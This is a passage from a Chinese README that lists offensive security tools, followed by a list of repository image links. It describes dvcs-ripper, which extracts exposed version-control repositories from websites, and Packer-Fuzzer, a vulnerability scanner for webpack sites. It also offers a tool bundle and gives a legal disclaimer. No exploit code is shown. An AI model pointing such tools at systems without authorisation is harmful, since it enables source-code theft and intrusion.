1282 | │ ├── btn-login-wx.png
1283 | │ ├── ico-add-pic.png
1284 | │ ├── ico-address.png
1285 | │ ├── ico-bm.png
1286 | │ ├── ico-duration-time.png
1287 | │ ├── ico-pop-close.png
1288 | │ ├── ico-right-top-delete.png
1289 | │ ├── page-login-hd.png
1290 | │ ├── pic-masker.png
1291 | │ └── ticket-selected.png
1292 | └── member
1293 | ├── assets
1294 | │ ├── css
1295 | │ │ ├── ace-reset.css
1296 | │ │ └── antd.css
1297 | │ └── lib
1298 | │ ├── cityData.min.js
1299 | │ └── ueditor
1300 | │ ├── index.html
1301 | │ ├── lang
1302 | │ │ └── zh-cn
1303 | │ │ ├── images
1304 | │ │ │ ├── copy.png
1305 | │ │ │ ├── localimage.png
1306 | │ │ │ ├── music.png
1307 | │ │ │ └── upload.png
1308 | │ │ └── zh-cn.js
1309 | │ ├── php
1310 | │ │ ├── action_crawler.php
1311 | │ │ ├── action_list.php
1312 | │ │ ├── action_upload.php
1313 | │ │ ├── config.json
1314 | │ │ ├── controller.php
1315 | │ │ └── Uploader.class.php
1316 | │ ├── ueditor.all.js
1317 | │ ├── ueditor.all.min.js
1318 | │ ├── ueditor.config.js
1319 | │ ├── ueditor.parse.js
1320 | │ └── ueditor.parse.min.js
1321 | └── static
1322 | ├── css
1323 | │ └── page.css
1324 | ├── img
1325 | │ ├── bg-table-title.png
1326 | │ ├── bg-tab-say.png
1327 | │ ├── ico-black-disabled.png
1328 | │ ├── ico-black-enabled.png
1329 | │ ├── ico-coorption-person.png
1330 | │ ├── ico-miss-person.png
1331 | │ ├── ico-mr-person.png
1332 | │ ├── ico-white-disabled.png
1333 | │ └── ico-white-enabled.png
1334 | └── scripts
1335 | ├── js
1336 | └── lib
1337 | └── jquery.min.js
1338 |
1339 | 21 directories, 48 files
1340 | ```
1341 |
1342 | ## .cvs源代码泄露利用工具
1343 |
1344 | ### 项目地址
1345 |
1346 | ```
1347 | https://github.com/kost/dvcs-ripper
1348 | ```
1349 |
1350 | ### 项目介绍
1351 |
1352 | ```
1353 | dvcs-ripper
1354 | 翻录 Web 可访问(分布式)版本控制系统:SVN、GIT、Mercurial/hg、bzr、...
1355 |
1356 | 即使关闭目录浏览,它也可以翻录存储库。
1357 | 确保将自己定位在要下载/克隆存储库的空目录中。
1358 | Support for brute forcing pack names
1359 | Intelligent guessing of packed refs
1360 | Support for objects/info/packs from https://www.kernel.org/pub/software/scm/git/docs/gitrepository-layout.html
1361 | Recognize 404 pages which return 200
1362 | Introduce ignore SSL/TLS verification in SVN/CVS
1363 | Bzr support
1364 | ```
1365 |
1366 | ## Webpack安全检测的扫描工具
1367 |
1368 | ### 项目地址
1369 |
1370 | ```
1371 | https://github.com/rtcatc/Packer-Fuzzer
1372 | ```
1373 |
1374 | ### 项目介绍
1375 |
1376 | ```
1377 | Packer Fuzzer
1378 | 一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具
1379 | 本工具支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。在扫描结束之后,本工具还支持自动生成扫描报告,您可以选择便于分析的HTML版本以及较为正规的doc、pdf、txt版本。
1380 | ```
1381 |
1382 | # 工具合集整理
1383 |
1384 | 以上所有工具都附上了下载地址,如果不想一一下载,这里已经打包好以上所有工具,公众号后台发送:**漏洞利用工具**,即可获取工具包
1385 |
1386 | 
1387 |
1388 | 最后再次申明:
1389 |
1390 | > 此合集所有工具都来源于互联网公开收集整理,请勿从事非法测试!!!在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。利用此工具集而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与原作者及收集者无关。该仅供安全人员用于授权测试,请勿非法使用!!!除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具集。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
1391 | >
1392 | > 注:工具集有些工具杀软会报毒,请自行判断是否存在后门,收集作者未加入任何后门!!!,建议在本地虚拟机中使用。
1393 | 欢迎关注本公众号,每日更新最新漏洞情报:
1394 |
1395 | 
1396 |
1397 |
1398 | ## Star History
1399 |
1400 | [](https://star-history.com/#onewinner/VulToolsKit&Date)
1401 |
--------------------------------------------------------------------------------
/assets/image-20240627092425-33egjal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092425-33egjal.png
--------------------------------------------------------------------------------
/assets/image-20240627092641-z11lhhg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092641-z11lhhg.png
--------------------------------------------------------------------------------
/assets/image-20240627092704-luie0j9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092704-luie0j9.png
--------------------------------------------------------------------------------
/assets/image-20240627093029-rgwih84.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093029-rgwih84.png
--------------------------------------------------------------------------------
/assets/image-20240627093039-hy5mms2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093039-hy5mms2.png
--------------------------------------------------------------------------------
/assets/image-20240627093052-vlaj022.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093052-vlaj022.png
--------------------------------------------------------------------------------
/assets/image-20240627093100-nm5ryus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093100-nm5ryus.png
--------------------------------------------------------------------------------
/assets/image-20240627093105-rs0mp7q.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093105-rs0mp7q.png
--------------------------------------------------------------------------------
/assets/image-20240627094033-t8q9zy8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094033-t8q9zy8.png
--------------------------------------------------------------------------------
/assets/image-20240627094041-c9nfwhn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094041-c9nfwhn.png
--------------------------------------------------------------------------------
/assets/image-20240627094050-the5fq1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094050-the5fq1.png
--------------------------------------------------------------------------------
/assets/image-20240627095322-zf9bpzu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627095322-zf9bpzu.png
--------------------------------------------------------------------------------
/assets/image-20240627095433-z1d6prl.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627095433-z1d6prl.png
--------------------------------------------------------------------------------
/assets/image-20240627101405-x3af9e7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627101405-x3af9e7.png
--------------------------------------------------------------------------------
/assets/image-20240627102006-4vbn0vg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627102006-4vbn0vg.png
--------------------------------------------------------------------------------
/assets/image-20240627104833-9sown7s.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627104833-9sown7s.png
--------------------------------------------------------------------------------
/assets/image-20240627105040-78fliwh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105040-78fliwh.png
--------------------------------------------------------------------------------
/assets/image-20240627105705-su49pl9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105705-su49pl9.png
--------------------------------------------------------------------------------
/assets/image-20240627105833-30qtagk.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105833-30qtagk.png
--------------------------------------------------------------------------------
/assets/image-20240627110852-l8sj81i.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627110852-l8sj81i.png
--------------------------------------------------------------------------------
/assets/image-20240627111232-o0yu9hz.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627111232-o0yu9hz.png
--------------------------------------------------------------------------------
/assets/image-20240627112005-llx5b02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627112005-llx5b02.png
--------------------------------------------------------------------------------
/assets/image-20240627112211-pznr73j.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627112211-pznr73j.png
--------------------------------------------------------------------------------
/assets/image-20240627120159-t5v1a60.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627120159-t5v1a60.png
--------------------------------------------------------------------------------
/assets/image-20240627135442-l71fy4u.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135442-l71fy4u.png
--------------------------------------------------------------------------------
/assets/image-20240627135553-9ru7crz.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135553-9ru7crz.png
--------------------------------------------------------------------------------
/assets/image-20240627135620-r0s0fge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135620-r0s0fge.png
--------------------------------------------------------------------------------
/assets/image-20240627140034-p4j08o0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140034-p4j08o0.png
--------------------------------------------------------------------------------
/assets/image-20240627140100-p4fdeel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140100-p4fdeel.png
--------------------------------------------------------------------------------
/assets/image-20240627140431-7i0plqs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140431-7i0plqs.png
--------------------------------------------------------------------------------
/assets/image-20240627140732-5a1mfgs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140732-5a1mfgs.png
--------------------------------------------------------------------------------
/assets/image-20240627141452-r6kpkoo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627141452-r6kpkoo.png
--------------------------------------------------------------------------------
/assets/image-20240627142612-xriy2tx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627142612-xriy2tx.png
--------------------------------------------------------------------------------
/assets/image-20240627143837-y5l0gsi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627143837-y5l0gsi.png
--------------------------------------------------------------------------------
/assets/image-20240627144355-s3e1ix4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627144355-s3e1ix4.png
--------------------------------------------------------------------------------
/assets/image-20240627144633-2abln9a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627144633-2abln9a.png
--------------------------------------------------------------------------------
/assets/image-20240627145957-zcz22sx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627145957-zcz22sx.png
--------------------------------------------------------------------------------
/assets/image-20240627151424-u1j7xhx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627151424-u1j7xhx.png
--------------------------------------------------------------------------------
/assets/image-20240627153035-qz8pjh6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627153035-qz8pjh6.png
--------------------------------------------------------------------------------
/assets/image-20240627153943-1ajvqbh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627153943-1ajvqbh.png
--------------------------------------------------------------------------------
/assets/image-20240627155236-lk8g7s3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627155236-lk8g7s3.png
--------------------------------------------------------------------------------
/assets/image-20240627155326-pdu5b7r.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627155326-pdu5b7r.png
--------------------------------------------------------------------------------
/assets/image-20240627164850-vfxoylp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627164850-vfxoylp.png
--------------------------------------------------------------------------------
/assets/image-20240627171913-hl7u95d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627171913-hl7u95d.png
--------------------------------------------------------------------------------